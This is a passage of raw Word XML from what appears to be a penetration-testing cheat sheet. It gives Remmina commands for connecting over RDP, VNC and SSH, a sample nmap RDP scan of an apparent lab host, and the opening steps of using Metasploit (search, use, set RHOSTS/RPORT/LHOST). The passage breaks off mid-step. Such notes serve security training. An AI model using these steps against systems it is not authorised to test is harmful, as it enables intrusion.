              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="003A1885">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="003A1885">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>remmina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB1D85" w14:paraId="3F44B2ED" w14:textId="77777777" w:rsidTr="0082528C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0E344108" w14:textId="60643AA7" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t>71.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="05AF79B8" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21E4E948" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t xml:space="preserve">Type the command </w:t>
            </w:r>
            <w:r w:rsidRPr="00D13BE3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">remmina </w:t>
            </w:r>
            <w:r>
              <w:t>to open up a gui or use one of these CLI examples:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">remmina </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>rdp://username@server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D640E7"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rdp://domain\\username@server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6784BE46"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vnc://username@server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8473E5"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vnc://server?VncUsername=username</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="765F0AAE"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ssh://user@server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3729A408"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spice://server</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To quick connect using a URI along with an encrypted password:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53869342"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rdp://username:encrypted-password@server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CCC2856" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">remmina </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>vnc://username:encrypted-password@server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F345184" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">remmina </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>vnc://server?VncUsername=username\&amp;VncPassword=encrypted-</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BD6E1B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37DD48F5" w14:textId="452832E8" w:rsidR="00DB1D85" w:rsidRPr="00322D20" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A1A1A">
              <w:t>Don’t forget to include the port number when providing the IP address.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB1D85" w14:paraId="19C7A234" w14:textId="77777777" w:rsidTr="0082528C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="292BA8E5" w14:textId="50219F67" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t>71.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0AFB0F5E" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ACEF792" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t>Here is an example of a nmap report with the availability of RDP…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00FC732F" w14:textId="2108BCF5" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3389/tcp open  ssl/ms-wbt-server?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FDB8F10" w14:textId="05CDE836" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| rdp-ntlm-info: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550C5378" w14:textId="475218B6" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|   Target_Name: RETROWEB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EB154F" w14:textId="338AE7B1" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|   NetBIOS_Domain_Name: RETROWEB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599D550F" w14:textId="72E74884" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|   NetBIOS_Computer_Name: RETROWEB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D506BB" w14:textId="2DD5DA47" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|   DNS_Domain_Name: RetroWeb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6FE517" w14:textId="0023A60C" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|   DNS_Computer_Name: RetroWeb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B45CD3" w14:textId="72A5BC13" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|   Product_Version: 10.0.14393</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3359F0B5" w14:textId="5B2D1B10" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>|_  System_Time: 2021-12-07T18:26:11+00:00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C894923" w14:textId="6C742E45" w:rsidR="00DB1D85" w:rsidRPr="00322D20" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A1A1A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>| ssl-cert: Subject: commonName=RetroWeb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00297371" w14:paraId="5DBDFC71" w14:textId="77777777" w:rsidTr="0006198D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="351A0A27" w14:textId="77777777" w:rsidR="00297371" w:rsidRDefault="00297371" w:rsidP="00297371"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43045402" w14:textId="77777777" w:rsidR="00297371" w:rsidRDefault="00297371" w:rsidP="00297371">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1817A267" w14:textId="77777777" w:rsidR="00297371" w:rsidRDefault="00297371" w:rsidP="00297371"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DCFA210" w14:textId="77777777" w:rsidR="007118F6" w:rsidRDefault="007118F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7BDBD" w14:textId="4B78A145" w:rsidR="00237A80" w:rsidRPr="00F15476" w:rsidRDefault="00237A80" w:rsidP="00237A80">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1036"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028087A" w14:paraId="3E2A8741" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5FC11A87" w14:textId="6B7A794E" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0E23A049" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00237A80">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Metasploit is installed in Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07C8D1F0" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">After getting vulnerabilities ideas from nmap, linPEAS, knowing WordPress is in use, etc, search for the corresponding exploit in Metasploit using the command: </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsle</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="12C75425" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0093A2C2" w14:textId="30058FEB" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3AD78D4C" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A546583" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">Once Metasploit is loaded, use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">search </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command and then use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r>
              <w:t>command.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>search</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>CVE NUMBER/NAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> CORRESPONDING NUMBER </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00237A80">
              <w:t>(Check left hand column)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="68DA0845" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03F3C52B" w14:textId="1DB98086" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="39DFBF2A" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57B57F1B" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">Now use </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">show options </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to see what options are already set, and which ones we need to configure. Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">OPTION NAME </w:t>
            </w:r>
            <w:r>
              <w:t>to do so.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>show options</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">set RHOSTS </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set RPORT </w:t>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET PORT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00385392">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set LHOST </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>INTERFACE TO USE ON OUR MACHINE</w:t>
            </w:r>
            <w:r>
